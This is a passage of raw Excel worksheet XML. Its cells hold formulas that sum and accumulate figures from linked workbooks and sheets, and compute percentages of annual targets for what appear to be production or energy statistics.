        <v>544.64</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'3'!H79</f>
        <v>2164.72</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>149293.19</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]4'!$I$7</f>
        <v>557.5</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'3'!K79</f>
        <v>2083</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>143974.45</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]4'!$L$7</f>
        <v>4966.5</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>9.933</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'[16]4'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'3'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]4'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'3'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]4'!$Y$15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G81+'3'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'3'!K81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G82+'3'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'3'!K82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G83+'3'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'3'!K83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G84+'3'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'3'!K84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G85+'3'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'3'!K85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5/31</f>
        <v>0.161290322580645</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>45996</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29109.38</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'4'!H5</f>
        <v>102648.1</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6257514.13</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>23856.681</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'4'!K5</f>
        <v>113865.197</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6263936.328</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>256404.537</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>68.5573628342245</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]5'!$W$101</f>
        <v>274.166666666667</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]5'!$X$101</f>
        <v>273.441666666667</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]5'!$Y$101</f>
        <v>260.242500969676</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]5'!$T$101</f>
        <v>100</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]5'!$U$101</f>
        <v>100</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]5'!$V$101</f>
        <v>65.1833702064897</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]5'!$Q$101</f>
        <v>24</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]5'!$R$101</f>
        <v>120</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]5'!$S$101</f>
        <v>5303.319</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]5'!$D$23+'[11]5'!$D$17+'[12]5'!$D$17+'[13]5'!$D$25+'[14]5'!$D$8+'[14]5'!$D$15+'[15]5'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]5'!$E$23+'[11]5'!$E$17+'[12]5'!$E$17+'[13]5'!$E$25+'[14]5'!$E$8+'[14]5'!$E$15+'[15]5'!$E$7</f>
        <v>0</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'4'!H6</f>
        <v>948</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>277297.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]5'!$I$23+'[11]5'!$I$17+'[12]5'!$I$17+'[13]5'!$I$25+'[14]5'!$E$23+'[14]5'!$E$30+'[15]5'!$H$7</f>
        <v>706.47</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'4'!K6</f>
        <v>3749.3</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>265947</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]5'!$L$23+'[11]5'!$L$17+'[12]5'!$L$17+'[13]5'!$L$25+'[14]5'!$H$23+'[14]5'!$H$30+'[15]5'!$K$7</f>
        <v>29311.54</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]5'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]5'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]5'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]5'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]5'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>'[10]5'!$V$102</f>
        <v>34.9704891838741</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]5'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]5'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]5'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]5'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]5'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'4'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]5'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'4'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]5'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]5'!$W$107</f>
        <v>121.470836855452</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]5'!$X$107</f>
        <v>122.334373279501</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]5'!$Y$107</f>
        <v>131.725408674289</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]5'!$T$107</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]5'!$U$107</f>
        <v>45.4083333333333</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]5'!$V$107</f>
        <v>31.2182890855457</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]5'!$Q$107</f>
        <v>11.83</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]5'!$R$107</f>
        <v>54.49</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]5'!$S$107</f>
        <v>2539.92</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]5'!$D$27+'[11]5'!$D$18+'[13]5'!$D$26+'[14]5'!$D$10+'[14]5'!$D$17+'[15]5'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]5'!$E$27+'[11]5'!$E$18+'[13]5'!$E$26+'[14]5'!$E$10+'[14]5'!$E$17+'[15]5'!$E$9</f>
        <v>1656</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'4'!H8</f>
        <v>5995</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>531531.99</v>
      </c>
      <c r="J8" s="194">
        <f>'[10]5'!$I$27+'[11]5'!$I$18+'[13]5'!$I$26+'[14]5'!$E$25+'[14]5'!$E$32+'[15]5'!$H$9</f>
        <v>2310.64</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'4'!K8</f>
        <v>12422.61</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>520167.32</v>
      </c>
      <c r="M8" s="194">
        <f>'[10]5'!$L$27+'[11]5'!$L$18+'[13]5'!$L$26+'[14]5'!$H$25+'[14]5'!$H$32+'[15]5'!$K$9</f>
        <v>35452.29</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>'[10]5'!$W$108</f>
        <v>120.710059171598</v>
      </c>
      <c r="S8" s="198">
        <f>'[10]5'!$X$108</f>
        <v>126.106194690265</v>
      </c>
      <c r="T8" s="198">
        <f>'[10]5'!$Y$108</f>
        <v>127.391217520581</v>
      </c>
      <c r="U8" s="198">
        <f>'[10]5'!$T$108</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V8" s="198">
        <f>'[10]5'!$U$108</f>
        <v>47.0833333333333</v>
      </c>
      <c r="W8" s="198">
        <f>'[10]5'!$V$108</f>
        <v>27.6960422812192</v>
      </c>
      <c r="X8" s="198">
        <f>'[10]5'!$Q$108</f>
        <v>11.83</v>
      </c>
      <c r="Y8" s="198">
        <f>'[10]5'!$R$108</f>
        <v>56.5</v>
      </c>
      <c r="Z8" s="198">
        <f>'[10]5'!$S$108</f>
        <v>2253.35</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>'[10]5'!$D$24+'[11]5'!$D$19+'[12]5'!$D$20+'[13]5'!$D$27+'[14]5'!$D$11+'[14]5'!$D$18+'[15]5'!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>'[10]5'!$E$24+'[11]5'!$E$19+'[12]5'!$E$20+'[13]5'!$E$27+'[14]5'!$E$11+'[14]5'!$E$18+'[15]5'!$E$10</f>
        <v>25933</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'4'!H9</f>
        <v>79387</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4214775.88</v>
      </c>
      <c r="J9" s="194">
        <f>'[10]5'!$I$24+'[11]5'!$I$19+'[12]5'!$I$20+'[13]5'!$I$27+'[14]5'!$E$26+'[14]5'!$E$33+'[15]5'!$H$10</f>
        <v>17038.251</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'4'!K9</f>
        <v>75041.797</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4172520.608</v>
      </c>
      <c r="M9" s="194">
        <f>'[10]5'!$L$24+'[11]5'!$L$19+'[12]5'!$L$20+'[13]5'!$L$27+'[14]5'!$H$26+'[14]5'!$H$33+'[15]5'!$K$10</f>
        <v>115210.915</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>'[10]5'!$W$109</f>
        <v>251.901944209637</v>
      </c>
      <c r="S9" s="198">
        <f>'[10]5'!$X$109</f>
        <v>270.365217391304</v>
      </c>
      <c r="T9" s="198">
        <f>'[10]5'!$Y$109</f>
        <v>271.29393044033</v>
      </c>
      <c r="U9" s="198">
        <f>'[10]5'!$T$109</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V9" s="198">
        <f>'[10]5'!$U$109</f>
        <v>47.9166666666667</v>
      </c>
      <c r="W9" s="198">
        <f>'[10]5'!$V$109</f>
        <v>35.0674778761061</v>
      </c>
      <c r="X9" s="198">
        <f>'[10]5'!$Q$109</f>
        <v>11.83</v>
      </c>
      <c r="Y9" s="198">
        <f>'[10]5'!$R$109</f>
        <v>57.5</v>
      </c>
      <c r="Z9" s="198">
        <f>'[10]5'!$S$109</f>
        <v>2853.09</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>'[10]5'!$D$25+'[11]5'!$D$20+'[12]5'!$D$21+'[13]5'!$D$28+'[14]5'!$D$12+'[14]5'!$D$19+'[15]5'!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>'[10]5'!$E$25+'[11]5'!$E$20+'[12]5'!$E$21+'[13]5'!$E$28+'[14]5'!$E$12+'[14]5'!$E$19+'[15]5'!$E$11</f>
        <v>971</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'4'!H10</f>
        <v>8999</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>926526.17</v>
      </c>
      <c r="J10" s="194">
        <f>'[10]5'!$I$25+'[11]5'!$I$20+'[12]5'!$I$21+'[13]5'!$I$28+'[14]5'!$E$27+'[14]5'!$E$34+'[15]5'!$H$11</f>
        <v>2761.82</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'4'!K10</f>
        <v>15831.18</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>913059.9</v>
      </c>
      <c r="M10" s="194">
        <f>'[10]5'!$L$25+'[11]5'!$L$20+'[12]5'!$L$21+'[13]5'!$L$28+'[14]5'!$H$27+'[14]5'!$H$34+'[15]5'!$K$11</f>
        <v>54374.762</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>'[10]5'!$W$110</f>
        <v>272.541666666667</v>
      </c>
      <c r="S10" s="198">
        <f>'[10]5'!$X$110</f>
        <v>275.030401297122</v>
      </c>
      <c r="T10" s="198">
        <f>'[10]5'!$Y$110</f>
        <v>268.905559161339</v>
      </c>
      <c r="U10" s="198">
        <f>'[10]5'!$T$110</f>
        <v>100</v>
      </c>
      <c r="V10" s="198">
        <f>'[10]5'!$U$110</f>
        <v>20.5583333333333</v>
      </c>
      <c r="W10" s="198">
        <f>'[10]5'!$V$110</f>
        <v>34.2764257620452</v>
      </c>
      <c r="X10" s="198">
        <f>'[10]5'!$Q$110</f>
        <v>24</v>
      </c>
      <c r="Y10" s="198">
        <f>'[10]5'!$R$110</f>
        <v>24.67</v>
      </c>
      <c r="Z10" s="198">
        <f>'[10]5'!$S$110</f>
        <v>2788.73</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>'[10]5'!$D$26+'[11]5'!$D$21+'[12]5'!$D$19+'[13]5'!$D$29+'[14]5'!$D$13+'[14]5'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>'[10]5'!$E$26+'[11]5'!$E$21+'[12]5'!$E$19+'[13]5'!$E$29+'[14]5'!$E$13+'[14]5'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'4'!H11</f>
        <v>0</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>0</v>
      </c>
      <c r="J11" s="194">
        <f>'[10]5'!$I$26+'[11]5'!$I$21+'[12]5'!$I$19+'[13]5'!$I$29+'[14]5'!$E$28+'[14]5'!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'4'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>'[10]5'!$L$26+'[11]5'!$L$21+'[12]5'!$L$19+'[13]5'!$L$29+'[14]5'!$H$28+'[14]5'!$H$35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12584</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'4'!H12</f>
        <v>41238.0000000001</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>4983629.25</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>23647.217</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'4'!K12</f>
        <v>88593.037</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5117699.413</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>337070.66800005</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>76.7814733485308</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>'[16]5'!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>'[16]5'!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>'[16]5'!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>'[16]5'!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>'[16]5'!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>'[16]5'!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>'[16]5'!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>'[16]5'!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>'[16]5'!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'4'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'4'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>61.8478289908349</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>'[11]5'!$W$68</f>
        <v>250.166666666667</v>
      </c>
      <c r="S13" s="209">
        <f>'[11]5'!$X$68</f>
        <v>247.794117647059</v>
      </c>
      <c r="T13" s="209">
        <f>'[11]5'!$Y$68</f>
        <v>266.272642658934</v>
      </c>
      <c r="U13" s="209">
        <f>'[11]5'!$T$68</f>
        <v>100</v>
      </c>
      <c r="V13" s="209">
        <f>'[11]5'!$U$68</f>
        <v>28.3333333333333</v>
      </c>
      <c r="W13" s="209">
        <f>'[11]5'!$V$68</f>
        <v>70.9135939036381</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>'[11]5'!$Q$68</f>
        <v>24.00</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>'[11]5'!$R$68</f>
        <v>34.00</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>'[11]5'!$S$68</f>
        <v>5769.53</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>4489</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'4'!H14</f>
        <v>10720</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>975263.676</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>4197.217</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'4'!K14</f>
        <v>25482.212</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1818426.318</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>67564.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>'[11]5'!$W$71</f>
        <v>207.004470938897</v>
      </c>
      <c r="S14" s="209">
        <f>'[11]5'!$X$71</f>
        <v>217.583756345178</v>
      </c>
      <c r="T14" s="209">
        <f>'[11]5'!$Y$71</f>
        <v>213.549837453229</v>
      </c>
      <c r="U14" s="209">
        <f>'[11]5'!$T$71</f>
        <v>55.9166666666667</v>
      </c>
      <c r="V14" s="209">
        <f>'[11]5'!$U$71</f>
        <v>41.0416666666667</v>
      </c>
      <c r="W14" s="209">
        <f>'[11]5'!$V$71</f>
        <v>50.095255653884</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>'[11]5'!$Q$71</f>
        <v>13.42</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>'[11]5'!$R$71</f>
        <v>49.25</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>'[11]5'!$S$71</f>
        <v>4075.75</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'4'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>0</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'4'!K15</f>
        <v>1055.335</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>115811.835</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>'[11]5'!$W$72</f>
        <v>63.7777777777778</v>
      </c>
      <c r="S15" s="209">
        <f>'[11]5'!$X$72</f>
        <v>66.0146699266504</v>
      </c>
      <c r="T15" s="209">
        <f>'[11]5'!$Y$72</f>
        <v>61.3452799472059</v>
      </c>
      <c r="U15" s="209">
        <f>'[11]5'!$T$72</f>
        <v>75</v>
      </c>
      <c r="V15" s="209">
        <f>'[11]5'!$U$72</f>
        <v>44.3083333333333</v>
      </c>
      <c r="W15" s="209">
        <f>'[11]5'!$V$72</f>
        <v>50.6596607669617</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>'[11]5'!$Q$72</f>
        <v>18.00</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>'[11]5'!$R$72</f>
        <v>53.17</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>'[11]5'!$S$72</f>
        <v>4121.67</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'4'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'4'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>'[11]5'!$W$73</f>
        <v>63.7777777777778</v>
      </c>
      <c r="S16" s="209">
        <f>'[11]5'!$X$73</f>
        <v>66.3343990972353</v>
      </c>
      <c r="T16" s="209">
        <f>'[11]5'!$Y$73</f>
        <v>62.9595964587775</v>
      </c>
      <c r="U16" s="209">
        <f>'[11]5'!$T$73</f>
        <v>75</v>
      </c>
      <c r="V16" s="209">
        <f>'[11]5'!$U$73</f>
        <v>44.3083333333333</v>
      </c>
      <c r="W16" s="209">
        <f>'[11]5'!$V$73</f>
        <v>52.2293510324484</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>'[11]5'!$Q$73</f>
        <v>18.00</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>'[11]5'!$R$73</f>
        <v>53.17</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>'[11]5'!$S$73</f>
        <v>4249.38</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f>G27+G37+G47+G57+G65+G72</f>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'4'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f>J27+J37+J47+J57+J65+J72+J76</f>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'4'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>'[12]5'!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>'[12]5'!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>'[12]5'!$Y$71</f>
